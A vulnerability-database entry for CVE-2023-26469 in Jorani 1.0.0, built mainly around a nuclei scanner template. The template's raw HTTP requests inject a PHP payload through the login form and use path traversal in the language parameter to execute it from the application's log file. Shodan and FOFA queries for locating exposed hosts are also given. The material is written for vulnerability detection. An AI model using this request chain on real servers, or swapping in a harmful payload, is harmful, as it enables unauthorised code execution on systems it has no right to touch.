Jorani 1.0.0 - Remote Code Execution

25 Jun 2026 05:45:03 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Jorani 1.0.0 - Remote Code Execution vulnerability, allows attacker to execute arbitrary code on serve

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Jorani Remote Code Execution Exploit | 21 Aug 2023 00:00 | zdt |
| GithubExploit | Exploit for Path Traversal in Jorani | 1 Sep 2023 09:41 | githubexploit |
| ATTACKERKB | CVE-2023-26469 | 17 Aug 2023 19:15 | attackerkb |
| BDU FSTEC | The vulnerability of the Jorani employee leave management software lies in the incorrect restriction on the path to the restricted catalog. This allows a hacker to execute arbitrary code. | 27 Oct 2023 00:00 | bdu_fstec |
| Circl | CVE-2023-26469 | 17 Aug 2023 22:38 | circl |
| CNNVD | Jorani path traversal vulnerability | 17 Aug 2023 00:00 | cnnvd |
| CVE | CVE-2023-26469 | 17 Aug 2023 00:00 | cve |
| Cvelist | CVE-2023-26469 | 17 Aug 2023 00:00 | cvelist |
| Metasploit | Jorani unauthenticated Remote Code Execution | 19 Aug 2023 19:51 | metasploit |
| NVD | CVE-2023-26469 | 17 Aug 2023 19:15 | nvd |

id: CVE-2023-26469

info:
  name: Jorani 1.0.0 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Jorani to a patched version or apply the necessary security patches.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26469
    - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
    - https://github.com/advisories/GHSA-7r9h-9r47-7vjj
    - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html
    - https://jorani.org/security-features-in-lms.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26469
    cwe-id: CWE-22
    epss-score: 0.81918
    epss-percentile: 0.99607
    cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: jorani
    product: jorani
    shodan-query: http.favicon.hash:-2032163853
    fofa-query: icon_hash=-2032163853
  tags: cve2023,cve,jorani,rce,packetstorm,vkev,vuln
variables:
  payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>"
  header: "{{to_upper(rand_base(12))}}"

http:
  - raw:
      - |
        GET /session/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /session/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
      - |
        GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
        Host: {{Hostname}}
        X-REQUESTED-WITH: XMLHttpRequest
        {{header}}: CVE-2023-26469

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '7cca0844e81cd333152def045fe075c2'

      - type: status
        part: header_3
        status:
          - 401

    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: csrf
        regex:
          - 'name="csrf_test_jorani" value="(.*?)"'
# digest: 4b0a00483046022100f85decf102e795f5d04109550514ed54559819e3052266cfe901fba4eb85dec8022100a83112d4cee73ad91052453f873e32af1a3ca48521c9fcd964f26d87d83602cc:922c64590222798bb761d5b6d8e72950

Scores as of 04 Feb 2026 07:00 (current):
Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 9.8
EPSS: 0.81918